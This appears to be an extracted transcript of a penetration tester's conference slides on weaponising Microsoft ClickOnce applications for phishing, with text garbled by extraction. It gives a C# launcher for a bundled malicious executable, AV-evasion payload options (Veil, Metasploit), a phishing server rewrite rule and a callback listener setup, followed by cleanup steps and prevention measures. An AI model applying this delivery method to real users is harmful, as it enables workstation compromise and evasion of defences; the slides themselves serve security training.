All You Need Is One -‐ A ClickOnce Love Story
Transcript of All You Need Is One -‐ A ClickOnce Love Story
![Page 1: All You Need Is One -‐ A ClickOnce Love Story](https://reader033.fdocuments.net/reader033/viewer/2022052606/586a1c5a1a28ab51458b9cab/html5/thumbnails/1.jpg)
All You Need Is One -‐ A ClickOnce Love Story
![Page 2: All You Need Is One -‐ A ClickOnce Love Story](https://reader033.fdocuments.net/reader033/viewer/2022052606/586a1c5a1a28ab51458b9cab/html5/thumbnails/2.jpg)
Introduc9on
• Ryan Gandrud ‒ Senior Security Consultant
• Penetra9on tester • Phishing service lead • Computer enthusiast
![Page 3: All You Need Is One -‐ A ClickOnce Love Story](https://reader033.fdocuments.net/reader033/viewer/2022052606/586a1c5a1a28ab51458b9cab/html5/thumbnails/3.jpg)
Overview
• ClickOnce? • Phishing-‐phriendly pheatures • Crea9ng a malicious ClickOnce applica9on • Phishing server setup • Issues and piDalls • Demo • Preven9on
![Page 4: All You Need Is One -‐ A ClickOnce Love Story](https://reader033.fdocuments.net/reader033/viewer/2022052606/586a1c5a1a28ab51458b9cab/html5/thumbnails/4.jpg)
ClickOnce WTF?
• ClickOnce – What is it? ‒ Executable wrapper ‒ Used to deploy installa9ons ‒ Supports mul9ple deployment methods
![Page 5: All You Need Is One -‐ A ClickOnce Love Story](https://reader033.fdocuments.net/reader033/viewer/2022052606/586a1c5a1a28ab51458b9cab/html5/thumbnails/5.jpg)
ClickOnce Internals
• ProjectName.applica9on ‒ Used to launch ClickOnce ‒ Contains the loca9on of the manifest and applica9on version informa9on
• ProjectName.exe.config.deploy ‒ Contains applica9on sePngs (i.e. connec9on strings, supported run9mes, etc.)
• ProjectName.exe.deploy ‒ The (poten9ally malicious) executable that will be run by a user
• ProjectName.exe.manifest ‒ Manifest file containing applica9on version, .NET versions supported, permission level requested, and signatures for the other files
‒ Contains the file name for the executable
![Page 6: All You Need Is One -‐ A ClickOnce Love Story](https://reader033.fdocuments.net/reader033/viewer/2022052606/586a1c5a1a28ab51458b9cab/html5/thumbnails/6.jpg)
ClickOnce Cer9ficate Signing
• Authen9code ‒ MicrosoW cert-‐based signing technology
• Necessary to “acquire” an code-‐signing Authen9code cer9ficate from a Cer9ficate Authority (CA) • Signing stages available ‒ Signed (CA) ‒ Self-‐signed (MakeCert.exe in .NET) ‒ Unsigned (No cert used)
![Page 7: All You Need Is One -‐ A ClickOnce Love Story](https://reader033.fdocuments.net/reader033/viewer/2022052606/586a1c5a1a28ab51458b9cab/html5/thumbnails/7.jpg)
ClickOnce Trust Architecture
• Based on different execu9on source zones • Allows permi]ed applica9ons to elevate privileges automa9cally (Trusted Sites) or through promp9ng the user • Promp9ng levels are controlled by the following registry key ‒ \HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\.NETFramework\Security\TrustManager\PrompEngLevel
![Page 8: All You Need Is One -‐ A ClickOnce Love Story](https://reader033.fdocuments.net/reader033/viewer/2022052606/586a1c5a1a28ab51458b9cab/html5/thumbnails/8.jpg)
ClickOnce Trust Architecture (cont.)
• These are features: "But the most important new feature when it comes to security is … the end user can elevate permissions without the help of an administrator“ • “If the applica9on permissions don't exceed policy permissions, the applica9on downloads and runs without asking the user any trust ques9ons.” • “If the applica9on needs more permissions than what's granted by policy, the user is asked if he wants to trust that applica9on and elevate permissions... If the user clicks Run, the applica9on is put into the Applica9on Trust List and is downloaded and started.”
![Page 9: All You Need Is One -‐ A ClickOnce Love Story](https://reader033.fdocuments.net/reader033/viewer/2022052606/586a1c5a1a28ab51458b9cab/html5/thumbnails/9.jpg)
ClickOnce Trust Architecture (cont.)
• Original trust zone configura9on during ClickOnce Beta
![Page 10: All You Need Is One -‐ A ClickOnce Love Story](https://reader033.fdocuments.net/reader033/viewer/2022052606/586a1c5a1a28ab51458b9cab/html5/thumbnails/10.jpg)
ClickOnce Trust Architecture (cont.)
• Modified trust architecture now in produc9on • Unsigned applica9ons from Internet zone now prompt user to elevate permissions
![Page 11: All You Need Is One -‐ A ClickOnce Love Story](https://reader033.fdocuments.net/reader033/viewer/2022052606/586a1c5a1a28ab51458b9cab/html5/thumbnails/11.jpg)
Owning With a Click
• Why use ClickOnce applica9on? ‒ Supported on all modern Windows opera9ng systems since it relies on .NET
‒ .NET supports backwards compa9bility within it’s own major version
‒ Dead simple to write (C#) ‒ Public browser exploits are highly version specific and more oWen than not, crash the vic9m’s browser
![Page 12: All You Need Is One -‐ A ClickOnce Love Story](https://reader033.fdocuments.net/reader033/viewer/2022052606/586a1c5a1a28ab51458b9cab/html5/thumbnails/12.jpg)
Owning With a Click (cont.)
• Originally meant to be deployed using Windows Internet Explorer ‒ Supported by IE 6.0+ ‒ Supported by Firefox and Chrome using third party addons (.NET 3.5+)
• Minimizes user interac9on • Delivers malicious code through mul9ple op9ons ‒ It’s a .NET project – write your own
• Include malicious executable as a resource
![Page 13: All You Need Is One -‐ A ClickOnce Love Story](https://reader033.fdocuments.net/reader033/viewer/2022052606/586a1c5a1a28ab51458b9cab/html5/thumbnails/13.jpg)
Payloads
• Roll your own payload ‒ Original vector
• Flagged by AV • Standard Metasploit payload ‒ Reverse_HTTPS returned broken shells
![Page 14: All You Need Is One -‐ A ClickOnce Love Story](https://reader033.fdocuments.net/reader033/viewer/2022052606/586a1c5a1a28ab51458b9cab/html5/thumbnails/14.jpg)
Payloads (cont.)
• Powershell ‒ Jus9n@sixdub follow up
• Great explana9on about using PowerShell commands within ClickOnce
‒ Pros: • Powershell command runs in memory – never touches disk
• AV evasion
‒ Cons: • Difficulty in changing payloads • ClickOnce is already on disk
![Page 15: All You Need Is One -‐ A ClickOnce Love Story](https://reader033.fdocuments.net/reader033/viewer/2022052606/586a1c5a1a28ab51458b9cab/html5/thumbnails/15.jpg)
Payloads (cont.)
• Veil-‐Evasion ‒ Pros:
• Payloads wri]en in different languages • Encrypted payloads
‒ Cons: • Sta9c “random” Meterpreter callback • Issue with how Metasploit handles stagers • Fixed with release of stageless Meterpreter
![Page 16: All You Need Is One -‐ A ClickOnce Love Story](https://reader033.fdocuments.net/reader033/viewer/2022052606/586a1c5a1a28ab51458b9cab/html5/thumbnails/16.jpg)
Payloads (cont.)
• Problem: ‒ Sta9c Meterpreter callbacks from targets
• Solu9on?: ‒ Dynamically genera9ng individualized Veil payloads
![Page 17: All You Need Is One -‐ A ClickOnce Love Story](https://reader033.fdocuments.net/reader033/viewer/2022052606/586a1c5a1a28ab51458b9cab/html5/thumbnails/17.jpg)
Crea9ng a ClickOnce Applica9on
• Visual Studio is used to create ClickOnce applica9ons ‒ The community edi9on of Visual Studio 2015 supports ClickOnce publishing
• Start a new console applica9on project within Visual Studio
![Page 18: All You Need Is One -‐ A ClickOnce Love Story](https://reader033.fdocuments.net/reader033/viewer/2022052606/586a1c5a1a28ab51458b9cab/html5/thumbnails/18.jpg)
Crea9ng a ClickOnce Applica9on (cont.)
• Using C# in .NET, create a new process that launches your included executable (ClickOnceInc.exe) static class Program { static void Main() { //Starting a new process executing the malicious exe System.Diagnostics.Process p = new System.Diagnostics.Process(); p.StartInfo.UseShellExecute = false; p.StartInfo.RedirectStandardOutput = false; p.StartInfo.FileName = "ClickOnceInc.exe"; p.Start(); } }
![Page 19: All You Need Is One -‐ A ClickOnce Love Story](https://reader033.fdocuments.net/reader033/viewer/2022052606/586a1c5a1a28ab51458b9cab/html5/thumbnails/19.jpg)
Crea9ng a ClickOnce Applica9on (cont.)
• Ensure that your applica9on uses the correct version of .NET so the applica9on runs properly. ‒ Windows 7 – 3.5.1 + 2.0 ‒ Windows 8 – 4.5 ‒ Windows 8.1 – 4.5.1 ‒ Windows 10 – 4.6
• Here, .NET 4.0 was chosen by naviga9ng to the Applica9on tab on the leW, and selec9ng the Target Framework from the dropdown.
![Page 20: All You Need Is One -‐ A ClickOnce Love Story](https://reader033.fdocuments.net/reader033/viewer/2022052606/586a1c5a1a28ab51458b9cab/html5/thumbnails/20.jpg)
Crea9ng a ClickOnce Applica9on (cont.)
![Page 21: All You Need Is One -‐ A ClickOnce Love Story](https://reader033.fdocuments.net/reader033/viewer/2022052606/586a1c5a1a28ab51458b9cab/html5/thumbnails/21.jpg)
Crea9ng a ClickOnce Applica9on (cont.)
• Include your malicious binary into the project by clicking and dragging it over your Solu9on Explorer
![Page 22: All You Need Is One -‐ A ClickOnce Love Story](https://reader033.fdocuments.net/reader033/viewer/2022052606/586a1c5a1a28ab51458b9cab/html5/thumbnails/22.jpg)
Crea9ng a ClickOnce Applica9on (cont.)
• In the Proper9es of the applica9on under Publish: ‒ Ensure the Install Mode is set to “available online only” • This prevents the applica9on from showing up in the Start Menu
‒ Clicking the Applica9on Files… bu]on • Exclude the hash for the ClickOnceInc.exe • Dynamic payload genera9on changes the hash
![Page 23: All You Need Is One -‐ A ClickOnce Love Story](https://reader033.fdocuments.net/reader033/viewer/2022052606/586a1c5a1a28ab51458b9cab/html5/thumbnails/23.jpg)
Crea9ng a ClickOnce Applica9on (cont.)
![Page 24: All You Need Is One -‐ A ClickOnce Love Story](https://reader033.fdocuments.net/reader033/viewer/2022052606/586a1c5a1a28ab51458b9cab/html5/thumbnails/24.jpg)
Crea9ng a ClickOnce Applica9on (cont.)
• Clicking the Publish bu]on, follow the wizard to publish the ClickOnce applica9on to your local drive • Should create mul9ple files/directories ‒ Applica9on Files directory ‒ Demo.applica9on ‒ Publish.htm ‒ Setup.exe
![Page 25: All You Need Is One -‐ A ClickOnce Love Story](https://reader033.fdocuments.net/reader033/viewer/2022052606/586a1c5a1a28ab51458b9cab/html5/thumbnails/25.jpg)
Crea9ng a ClickOnce Applica9on (cont.)
![Page 26: All You Need Is One -‐ A ClickOnce Love Story](https://reader033.fdocuments.net/reader033/viewer/2022052606/586a1c5a1a28ab51458b9cab/html5/thumbnails/26.jpg)
Server Setup
• Web server ‒ Kali(2.0) with Veil, Metasploit, and Apache
• Apache mod_rewrite ‒ GET evil.com?u={ID} -‐> evil.com/{ID}/evil.applica9on
‒ Combined with dynamic Veil payloads, allowed easy analy9cs and post-‐mortem data gathering.
![Page 27: All You Need Is One -‐ A ClickOnce Love Story](https://reader033.fdocuments.net/reader033/viewer/2022052606/586a1c5a1a28ab51458b9cab/html5/thumbnails/27.jpg)
Callback Listener
• Metasploit listener ‒ Phishing scenario – targets are worksta9ons ‒ Most likely have outbound h]p access ‒ Limited window of engagement
![Page 28: All You Need Is One -‐ A ClickOnce Love Story](https://reader033.fdocuments.net/reader033/viewer/2022052606/586a1c5a1a28ab51458b9cab/html5/thumbnails/28.jpg)
PiDalls
• Outdated packages / dependencies ‒ Veil, Python, Wine.
• Signing restric9ons ‒ No signing allowed with dynamic payloads
• No easy way to use mage.exe on linux ‒ Self-‐signed certs are only marginally be]er
![Page 29: All You Need Is One -‐ A ClickOnce Love Story](https://reader033.fdocuments.net/reader033/viewer/2022052606/586a1c5a1a28ab51458b9cab/html5/thumbnails/29.jpg)
Cleanup
• ClickOnce install directory: ‒ %LOCALAPPDATA%\Apps\2.0\{machine-‐specific}\{machine-‐specific}\{obfuscated-‐app-‐name} • C:\Users\Bob\AppData\Local\Apps\2.0\F3RBL2XD.32Y\Z3R2E8LL.92S\{app-‐folder}
![Page 30: All You Need Is One -‐ A ClickOnce Love Story](https://reader033.fdocuments.net/reader033/viewer/2022052606/586a1c5a1a28ab51458b9cab/html5/thumbnails/30.jpg)
Cleanup
• Add/Remove Programs • Delete relevant AppData folder • Nuke everything:
‒ Note: This will clear the en9re online applica9on cache.
‒ No need for elevated privileges, AppCaches are user-‐specific.
rundll32 dfshim CleanOnlineAppCache
![Page 31: All You Need Is One -‐ A ClickOnce Love Story](https://reader033.fdocuments.net/reader033/viewer/2022052606/586a1c5a1a28ab51458b9cab/html5/thumbnails/31.jpg)
Demo
• Client: ‒ Windows 10
• Server (hack.me): ‒ Kali 2.0 running Apache to serve file ‒ Metasploit listener running to catch callback
![Page 32: All You Need Is One -‐ A ClickOnce Love Story](https://reader033.fdocuments.net/reader033/viewer/2022052606/586a1c5a1a28ab51458b9cab/html5/thumbnails/32.jpg)
Preventa9ve Measures
• Typical An9-‐Phishing Techniques In Place ‒ User educa9on ‒ Endpoint protec9on ‒ Least privileged configura9ons
• Helpful, but not effec9ve enough
![Page 33: All You Need Is One -‐ A ClickOnce Love Story](https://reader033.fdocuments.net/reader033/viewer/2022052606/586a1c5a1a28ab51458b9cab/html5/thumbnails/33.jpg)
Preventa9ve Measures
• ClickOnce-‐Specific Techniques ‒ Code Access Security
• ClickOnce applica9ons can specify a “permissions level”
• Default: Full Trust – Requires prompt for eleva9on
![Page 34: All You Need Is One -‐ A ClickOnce Love Story](https://reader033.fdocuments.net/reader033/viewer/2022052606/586a1c5a1a28ab51458b9cab/html5/thumbnails/34.jpg)
Preventa9ve Measures
• Disabling Trust Prompt ‒ \HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\.NETFramework\Security\TrustManager\Promp9ngLevel
‒ Trust prompt is controlled by zone • Untrusted Sites • Internet • My Computer • Local Intranet • Trusted Sites
![Page 35: All You Need Is One -‐ A ClickOnce Love Story](https://reader033.fdocuments.net/reader033/viewer/2022052606/586a1c5a1a28ab51458b9cab/html5/thumbnails/35.jpg)
Preventa9ve Measures
![Page 36: All You Need Is One -‐ A ClickOnce Love Story](https://reader033.fdocuments.net/reader033/viewer/2022052606/586a1c5a1a28ab51458b9cab/html5/thumbnails/36.jpg)
Preventa9ve Measures
• Windows 8/10 ‒ SmartScreen Filter
• Enabled by default • Default ‘OK’ ac9on results in applica9on not running
![Page 37: All You Need Is One -‐ A ClickOnce Love Story](https://reader033.fdocuments.net/reader033/viewer/2022052606/586a1c5a1a28ab51458b9cab/html5/thumbnails/37.jpg)
![Page 38: All You Need Is One -‐ A ClickOnce Love Story](https://reader033.fdocuments.net/reader033/viewer/2022052606/586a1c5a1a28ab51458b9cab/html5/thumbnails/38.jpg)
Ques9ons?
![Page 39: All You Need Is One -‐ A ClickOnce Love Story](https://reader033.fdocuments.net/reader033/viewer/2022052606/586a1c5a1a28ab51458b9cab/html5/thumbnails/39.jpg)
More Informa9on / References
• Alice in Warningland: A Large-‐Scale Field Study of Browser Security Warning Effec9veness ‒ Devda]a Akhawe University of California, Berkeley,
devda][email protected] ‒ Adrienne Porter Felt Google, Inc, [email protected]
• h]p://leastprivilege.com/2006/02/18/beware-‐be-‐aware-‐of-‐clickonce-‐default-‐sePngs/
• h]ps://msdn.microsoW.com/en-‐us/library/aa719097(v=vs.71).aspx • h]ps://msdn.microsoW.com/en-‐us/library/cc176048(v=vs.90).aspx • h]ps://msdn.microsoW.com/en-‐us/library/ee308453.aspx • h]ps://robindotnet.wordpress.com/2013/02/24/windows-‐8-‐and-‐
clickonce-‐the-‐defini9ve-‐answer-‐2/ • h]ps://blog.netspi.com/bypassing-‐av-‐with-‐veil-‐evasion/ • h]ps://github.com/rapid7/metasploit-‐framework/issues/4895 • h]p://www.sixdub.net/?p=555